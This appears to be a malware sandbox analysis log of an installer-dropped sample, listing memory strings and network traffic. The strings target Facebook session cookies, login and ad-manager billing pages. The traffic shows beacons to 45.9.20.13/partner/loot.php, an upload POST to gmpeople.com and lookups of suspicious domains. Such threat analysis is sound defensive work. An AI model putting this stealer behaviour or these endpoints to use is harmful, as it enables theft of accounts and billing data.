                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: %_Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Sec-Fetch-Dest: documentOrigin: https://www.facebook.com*?[Upgrade-Insecure-Requests: 1 equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: /www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Host: www.facebook.comloginKhe4g4 headerUg4e4GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: Origin: https://www.facebook.com equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: Referer: https://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Sec-Fetch-Mode: navigateSQSec-Fetch-Site: same-originUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: document/ads/manager/account_settings/account_billingSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Upgrade-Insecure-Requests: 1api/graphql/?lll=pppwbConnection: keep-alivesec-ch-ua-mobile: ?0sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"X-FB-Friendly-Name: BillingAMNexusRootQueryAccept: */*Origin: https://www.facebook.com%SSec-Fetch-Site: same-originSec-Fetch-Mode: cors:Sec-Fetch-Dest: emptyAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1/api/graphql/:Connection: keep-alivesec-ch-ua-mobile: ?0Accept: */*sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"X-FB-Friendly-Name: BillingTransactionTableQuerySec-Fetch-Site: same-originOrigin: https://www.facebook.com0Sec-Fetch-Mode: cors1Sec-Fetch-Dest: empty%SAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v10.0/act_Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Accept: */*Content-type: application/x-www-form-urlencodedReferer: https://www.facebook.com/Sec-Fetch-Site: same-siteOrigin: https://www.facebook.com1Sec-Fetch-Dest: empty.Sec-Fetch-Mode: corsprimary_location/infostateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9secure||viewport-width: 1920profile.phpmanager/account_settings/account_billingdomain//Sec-Fetch-Dest: documentc_user Sec-Fetch-Mode: navigate=Sec-Fetch-Site: none;Upgrade-Insecure-Requests: 1=pages/?category=your_pageshttps://www.facebook.com/ Sec-Fetch-Dest: document:Sec-Fetch-Mode: navigate=Sec-Fetch-Site: none:Sec-Fetch-User: ?1Upgrade-Insecure-Requests: 1SendingGh8eu4i proxyPj9k4eh credentialsMn7j4e=SendingGfe5g requestRgreh4elogin get cookie407_khfa4i TheGhehg4g proxyIje4hg requiresDge4gj89 authenticationQerhj4ghnameBreakHghel3g forPe4jjhg multipleTje7i4hg 407_uh7a4r responseP5orjteg=error_self1Error (WinHttpSetOption)domain1Error (WinHttpSetOption) equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http-x0X0@httpserror 9 code=Using WINHTTP_AUTH_SCHEME_NEGOTIATEUsing WINHTTP_AUTH_SCHEME_NTLMPOSTlogin/device-based/loginContent-Type: application/x-www-form-urlencodedhttp://staticimg.youtuuee.com//www.facebook.com/Host: www.facebook.comlogin/device-based/login equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/billing_history/summary/ equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/campaigns?act=fb_id equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/api/graphql/?lll=ppp equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/login/device-based/login/ equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
                  Source: global trafficDNS traffic detected: DNS query: hsiens.xyz
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                  Source: global trafficDNS traffic detected: DNS query: t.gogamec.com
                  Source: global trafficDNS traffic detected: DNS query: topniemannpickshop.cc
                  Source: global trafficDNS traffic detected: DNS query: niemannbest.me
                  Source: global trafficDNS traffic detected: DNS query: all-mobile-pa1ments.com.mx
                  Source: global trafficDNS traffic detected: DNS query: buy-fantasy-football.com.sg
                  Source: global trafficDNS traffic detected: DNS query: iplogger.org
                  Source: global trafficDNS traffic detected: DNS query: ggg-cl.biz
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: global trafficDNS traffic detected: DNS query: wfsdragon.ru
                  Source: global trafficDNS traffic detected: DNS query: gmpeople.com
                  Source: unknownHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmpeople.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: gmpeople.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:10 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=AfndMd6V.01zjDiumP1PeZVw9D3mvKbYwSxt1mf4OCc-1724230630-1.0.1.1-Su3GzT_pD9Fd2iir70fJfh6iPQXBLIjlmncMkZj1espOH5eZjMkNvoYB2y22bW8fmUFV3kaNOu3P1T1jJXDenw; path=/; expires=Wed, 21-Aug-24 09:27:10 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbZHdRtMfj5bkjpOb%2FzbDVaL5UULNkIIWIl%2FXd449UHwSnz7ZV0luAlfszeirf7ZADcAxCHGgmAjuL2JC5gAPhfupHzk5XCQy7BGQfaT4gLz4L3caoPdoR4rzuDW9v0781jT%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=kDH.E_8UF2IoEITcXP_U.dJxTq9jfJMUGZtrXg380is-1724230630799-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a026e8f43cb-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:16 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Kf_VuceftkvZS0FPH4WUMRZQURdya_GLHzNI1zvjHyM-1724230636-1.0.1.1-r6Il9KxaCq4ZRPwxn7frVCAmPRFFrRIet8wSmHS7UwqEFeO.eFnUGttWsgmoF89kEnbFkHu4a2Xfeqd0nD_tgQ; path=/; expires=Wed, 21-Aug-24 09:27:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c9nez5obEMfbTn%2FXz243fxrIEoQqCXBEQheCbzHAITsf1sn58gbIwuBEI4h%2FZV8qZnKMYI4d1LgounAhGDgly8B18ltQE3UpfziRx1msT0kJwjl7mlueSuTOdRPsHQelIp%2FJOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=jD4ZsvDd9vq70OPT5ILhDKCp_PeGb1kJS__E3NpTPVo-1724230636877-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a286c9719c7-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:22 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Vb4tNUszopoTKlKZCyzIQ9nbpFwgczMDsqzQz8Lfd.k-1724230642-1.0.1.1-7WwYIHnoE16UQljoMR6Qdu2Mc4CtrUDFK1zWrNEw99aK8F5Y50NaFU.79cEBagC9yQhQc2LNRnliFJPytWZxdg; path=/; expires=Wed, 21-Aug-24 09:27:22 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B57LjwBbRJhiB%2B1yzh7MCmOVtH6mvDA6KF4v7IT4u7XR08Cpx6HZJAYKBja3BNHdC2y8ef5qy4p1Upavx6WfUg0G%2FcwHRjZAGpd23vdUdu42qfKAjHxnvQ8BB1mGh%2BEAOp1CQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=jJ_Aw6TKVgt4IWYlzPJYjZGyv5xjbxbQZx1WLIOYJSo-1724230642543-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a4bdec00f49-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:28 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=rZ7VWVJTnKf5y6.8joyi_H0Z5j1_BcfGYSJpVIVcctw-1724230648-1.0.1.1-5TrN5OUCfTgRyoFnROqZ4O2Djew7SRKAZCsl8oGLCiv6WAhsD0uU884paD5iaTCSLvaVpCVyDzbcW4wH1uupdw; path=/; expires=Wed, 21-Aug-24 09:27:28 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNyXCoxmfQjMYFr8wsYPf9IbqjpNKW3EJ2donBl4tCl%2BpCf89%2FSV2aNZ7zV0EqDqMDosm7eVtP524Nb2c8r60jTdkSKB1rR1J%2BJXcade%2FseV%2FqllNN9ph06g2MkOdPsdInfCiQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=lkblbI.hdcugeqnkS.eoRPCLlkfg5IFBgzT7nhXC8Ko-1724230648181-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a6f181ac351-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8b696a74afdf423f-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:33 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=M2uO.1.PcACkGnZDsgrNCqmml2zVXqHzFQvKKBacpSE-1724230653-1.0.1.1-60ojZuLVEcG3c8NHRxN.kUPyVvY4lkWE8h.R3nFJlOGji1V1eG0dr04KsPo0x8EGiIZJEbBm2_IFicXSgatNJQ; path=/; expires=Wed, 21-Aug-24 09:27:33 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5zS7bLFu2w%2F3FjwhMtksCi95i9UdTj10Kpdjk4T4TpLyI9x%2BIlDta1f07Mq%2ByIfaV3YzANid1AtSyqIP9XP%2BSeouYUMnr36XVJYY7%2BmnLiLxvNhid7QrGNlAdrMZFbJopflaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=g9cXa5aXWK95l.pZHUJh2luNMN6BxuFKyqIoO4XsDN0-1724230653839-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a925f6c4211-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:39 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=eTOcN338iJPkKWDX6.nqa3zwWV0DsGurA5C3Yed6Zbs-1724230659-1.0.1.1-HSbqEhkiw1hJfJNcwXZieyCfMT0PwXC8nw1p.Aws4Yo0k3htruQKM9ZgN.sCUh0SCFELZd_GgIrqHkjST_HJqg; path=/; expires=Wed, 21-Aug-24 09:27:39 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmRX5scst0fCvz0F%2Fk4JYIFD3K5UoJaUDUaKjxec53vGYufIR%2BX0HukOGHMZRijQmppVMZFtuJJoaBlm0pnLScyew09CYruop9DSYVwU5Gz%2F%2BgKyP0ycgAY3Wil9efdk%2BSdjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=EXI_dRZVnDascO6a90jw3WVKoDmPE5WUxcaB86l5mtQ-1724230659453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696ab58ccd41d3-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:45 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=8CVcyNZfC9nOorg38LU1pIJKYi5MqrmMXhCIT.F3fg8-1724230665-1.0.1.1-HXsEZewA7LjPb8P483nbiINrFDOR2v56uHdlA0kyEgBUUXyxo8SjvdLwPlO0dXl1alUmvt2q6lTKMb8XS.vg6g; path=/; expires=Wed, 21-Aug-24 09:27:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGSIgPvvOdZ2T5qPQiexELLUhfyXkNGS619xCBK%2FmbWeb7Z90KTrPL8tu%2BUzlvq%2Bv4ZTlsf2zd4eTPAimkWG8bXAQ%2FwMrUDUclYy%2BO8Xb0RAjE3O6dE5uJAkKP%2Fp20AYQBPLhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=FyAm59iaq4RnfE_eCoL4GeouO89J4T.7q_QY667W6BE-1724230665079-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696ad8a92d7c96-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:50 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=qU8rfA7XdmwSG5ysqqfRhYa0c5m0eTknlyPuY_X2Zc4-1724230670-1.0.1.1-aifQIHyl1IKHGCBxL30n0hpAvqvV2qItjnuTsTJRkyiHf14__klbUNOXwSphO8IAzAGrZMiBlNThUx99s5WHTw; path=/; expires=Wed, 21-Aug-24 09:27:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tqlj64OpuItPLuokibqTvasX99m19tzptAxCizZM1%2FsLfopaUum0CMiQU6%2FHtFqxbVCmC3RXu%2FeKb%2FOKVXT3hWp149CVzS9qoEAhui7MJb9Gajl6gmNrmzSCuxt4U6GV6bZZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Ia86BkihzpSWVNbCkYJjIxbAuDBLdLrrD9.E_HB4N8Q-1724230670843-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696afcb9227ca5-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=6zuegI48FEcVXZfst96HdNFv3TSFNVQwFsPOqjTjm6g-1724230676-1.0.1.1-hGy1ywwrTckLgTjC26D6_F.xZwY0uh5hzm0UkHi9PHKJVTLj0Gvku2r29PHELhoJzbsqaKi0bf6H0gorhGoZqQ; path=/; expires=Wed, 21-Aug-24 09:27:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPoepVex4tK3GckkvYZLrn%2BXW4aB5tlxtZejxSeqd34%2FiHTfeIKl%2BpJZghmXz5xTae0gLtpJluBOK3OD6emk6GtaSht3QU6C6pLKvjSEG%2BZQetWa4IEomiUhs0G9HedxENq0qQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=cGD49sxET8z.WKWEjwxrS_ZECHJh9v4zpLMJHiP7KNI-1724230676489-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b1ff87e4319-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=knesx7DSN5Jf9.f8nrcNe45dUvIee84DYFvSB0waUbA-1724230682-1.0.1.1-afhx6ocTWqnt.ionZY.wK7ha6AEq1GVZNUs8Sn_DQbRN2jlNCxgMhpoRRTmGIT7JtqYHjBy4YGz4p2bRFDXEMQ; path=/; expires=Wed, 21-Aug-24 09:28:02 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FwMRErWBlHWTAXo6O8ONlrp6c1aYnMBbX6zSKFG4zWd2kpeqLzP4nb8SQVR%2FHOMITvFWtTKZsonxHnZjPAGrxU9JuG2xHVsMlZXsjEmdPokHfY10i3QbyuIpAOnsokjLBa7cZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=BTdj7aneGMzxlvEWKOh886C10hnjhxHmPMOc6dOKEKI-1724230682127-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b4338974204-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QBfgPowNSyHKBwR4f7j3OJQn_APs9Y.XzKYVaxMZMMc-1724230687-1.0.1.1-piFiTuSgFWnFvr615lIClE_pu43vyZ4PZ5ZZpULNdkvbL.N1DFWU6OBp4Z9bMUvY4hOZcLSSQPj0mlVW8P2s3A; path=/; expires=Wed, 21-Aug-24 09:28:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqHycy%2BgnWyAz6cOaaQCtMgB4h%2BuT3rt4wvexZiL%2Brg9Lv3fWb0Ylp0wyU3M7CBcx5TzHRlseblMYHP9FYF5p2TW%2F%2BgTAHz4pC5aYVSJHGAl0aKteFSp%2B69L%2FTUV6pQUZYMN4Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=X33qFnUkNQW1Ewxnpo4ZVIZo8wKEB7yMr056MhSjbCE-1724230687749-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b665922428f-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=bskmNyFA.em5pucrqCIeIAZxchsxcrAWFg7iixkJhvA-1724230693-1.0.1.1-47TjB8Yk9s.11hO6ZntteaTo8FbnA9qjd91b2I_Dr5q0RZaWWW5K3IUD5FyoZXX4QIN3AEIaSqWIk57yWm0NwA; path=/; expires=Wed, 21-Aug-24 09:28:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjMAwkdG0jbfdYcVfaeNwH9J3rviF3UGMvuZpmLWrAUdY4DIRoaLwQgOp%2Bmon%2BIrX7BTdB%2FsXko3ijz67fK7EudLWpuGfiV%2FLo5lWOaR5ia%2BXrYpUCRtJl3lDFxPbPPjC9zV7Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=L47pnd5qDKv8ufhpS4KEHViVs6Z4b0fUpsJ4_MrWGco-1724230693394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b899b0f7ca6-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:19 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=xX3H1OGqwmcWYigOX2Y0PXpWbveQUJPOzdgLKH1otTc-1724230699-1.0.1.1-XgtMHmm5jtkcBxJXYcob_OBN.7dzkLGmK6UG1ZnRM9pIuwE7ylMt1bozok8pWoThanDZGOxH8XwwKUsuzbr48A; path=/; expires=Wed, 21-Aug-24 09:28:19 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vvlzd%2FnGLUcWrWE%2FsSLglO3kPKD4ADwOlxWdyNkM46L5l5uqpzu1JFX%2BgifvU847wWuWCGkBEq5leczmnL5b%2BPdwBOzOOCoxTlGdsDXqUs7WShRf65xy5xnPUVMTYa3OIS9WPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=MrWa4TPd6T5gDzXo7vdMSZrVbSssLLC_hrH8VND8Yec-1724230699076-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696bad28fb8c63-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QCPexjQNCs2wcHfkMc3UB.KIL7v29VmCdADSrpsw1c4-1724230704-1.0.1.1-u2LWwTgBDJGOd27KhzdqLBonf2yhVTEUiQXtrOCU3IcGpiahiwFE8HhBaGhXGr6E5Qf9r4Gn1Acm0gh0Dnk7mA; path=/; expires=Wed, 21-Aug-24 09:28:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQNvSm18ZHkfgQFbwFxRSIONDoOx5MvXtAz1G0j1qz3qpOgum9JorpGJSkCp8QMPovbaueFNTQ2p4i9k%2FocaVfhR73QBpNDNjyJc4JM038vpmjbfTfjK%2BLlweau%2FSn8RV%2FRCvg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=pNhmg.qUGiJXIK7Ia9wLlTbaFN.0BHeOkU_CnIP8v6o-1724230704735-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696bd08a5e72b3-EWRalt-svc: h3=":443"; ma=86400
